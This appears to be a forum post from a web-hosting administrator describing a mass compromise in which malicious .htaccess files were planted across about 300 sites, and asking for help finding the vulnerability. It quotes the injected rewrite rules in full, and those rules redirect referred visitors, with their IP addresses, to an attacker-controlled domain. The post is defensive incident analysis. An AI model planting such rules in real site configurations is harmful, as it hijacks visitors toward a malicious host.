We operate a webserver farm hosting around 300 websites.

Yesterday morning a script placed .htaccess files owned by www-data (the apache user) in every directory under the document_root of most (but not all) sites.

The content of the .htaccess file was this:

RewriteEngine On
RewriteCond %{HTTP_REFERER} ^http://
RewriteCond %{HTTP_REFERER} !%{HTTP_HOST}
RewriteRule . http://84f6a4eef61784b33e4acbd32c8fdd72.com/%{REMOTE_ADDR}

Googling for that url (which is the md5 hash of "antivirus") I discovered that this same thing happened all over the internet, and am looking for somebody who has already dealt with this, and determined where the vulnerability is.

I have searched most of our logs, but haven't found anything conclusive yet. Are there others who experienced the same thing that have gotten further than I have in pinpointing the hole?

So far we have determined:

• the changes were made as www-data, so apache or it's plugins are likely the culprit
• all the changes were made within 15 minutes of each other, so it was probably automated
• since our websites have widely varying domain names, I think a single vulnerability on one site was responsible (rather than a common vulnerability on every site)
• if an .htaccess file already existed and was writeable by www-data, then the script was kind, and simply appended the above lines to the end of the file (making it easy to reverse)

Any more hints would be appreciated.